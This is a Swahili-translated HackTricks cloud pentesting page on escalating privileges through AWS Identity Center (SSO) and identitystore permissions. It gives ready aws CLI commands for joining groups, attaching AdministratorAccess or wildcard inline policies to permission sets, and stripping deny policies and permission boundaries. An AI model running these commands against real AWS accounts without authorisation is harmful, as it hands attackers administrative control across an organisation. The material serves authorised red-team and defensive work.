AWS - SSO & identitystore Privesc

Reading time: 6 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

AWS Identity Center / AWS SSO

Kwa maelezo zaidi kuhusu AWS Identity Center / AWS SSO angalia:

AWS - IAM, Identity Center & SSO Enum

warning

Kumbuka kwamba kwa default, ni watumiaji pekee wenye ruhusa kutoka kwenye Management Account watakuwa na uwezo wa kufikia na kudhibiti IAM Identity Center.
Watumiaji kutoka akaunti nyingine wanaweza tu kuruhusiwa ikiwa akaunti hiyo ni Delegated Adminstrator.
Angalia nyaraka kwa maelezo zaidi.

Reset Password

Njia rahisi ya kupandisha mamlaka katika hali kama hii ingekuwa kuwa na ruhusa inayoruhusu kubadilisha nywila za watumiaji. Kwa bahati mbaya, inawezekana tu kutuma barua pepe kwa mtumiaji ili kubadilisha nywila yake, hivyo unahitaji ufikiaji wa barua pepe ya mtumiaji.

identitystore:CreateGroupMembership

Kwa ruhusa hii inawezekana kuweka mtumiaji ndani ya kundi ili inherit ruhusa zote ambazo kundi lina.

bash
aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kutoa ruhusa za ziada kwa Seti ya Ruhusa ambayo imetolewa kwa mtumiaji chini ya udhibiti wake

bash
# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kutoa ruhusa za ziada kwa Seti ya Ruhusa ambayo imetolewa kwa mtumiaji chini ya udhibiti wake

bash
# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kutoa ruhusa za ziada kwa Seti ya Ruhusa ambayo imetolewa kwa mtumiaji chini ya udhibiti wake.

warning

Ili kutumia vibaya ruhusa hizi katika kesi hii unahitaji kujua jina la sera inayosimamiwa na mteja ambayo iko ndani ya AKAUNTI ZOTE ambazo zitakathiriwa.

bash
# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:CreateAccountAssignment

Mshambuliaji mwenye ruhusa hii anaweza kumpa Seti ya Ruhusa mtumiaji chini ya udhibiti wake kwa akaunti.

bash
aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>

sso:GetRoleCredentials

Inarudisha akiba za muda mfupi za STS kwa jina la jukumu lililotolewa kwa mtumiaji.

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

Hata hivyo, unahitaji token ya ufikiaji ambayo sijaweka wazi jinsi ya kupata (TODO).

sso:DetachManagedPolicyFromPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kuondoa uhusiano kati ya sera inayosimamiwa na AWS kutoka kwa seti ya ruhusa iliyotajwa. Inawezekana kutoa ruhusa zaidi kupitia kuondoa sera inayosimamiwa (sera ya kukataa).

bash
aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kuondoa uhusiano kati ya sera inayosimamiwa na Mteja kutoka kwa seti ya ruhusa iliyoainishwa. Inawezekana kutoa ruhusa zaidi kupitia kuondoa sera inayosimamiwa (sera ya kukataa).

bash
aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeleteInlinePolicyFromPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kuondoa ruhusa kutoka kwa sera ya ndani kutoka kwa seti ya ruhusa. Inawezekana kutoa ruhusa zaidi kupitia kuondoa sera ya ndani (sera ya kukataa).

bash
aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

sso:DeletePermissionBoundaryFromPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kuondoa Mipaka ya Ruhusa kutoka kwa seti ya ruhusa. Inawezekana kutoa ruhusa zaidi kwa kuondoa vizuizi kwenye Seti ya Ruhusa vilivyotolewa kutoka kwa Mipaka ya Ruhusa.

bash
aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks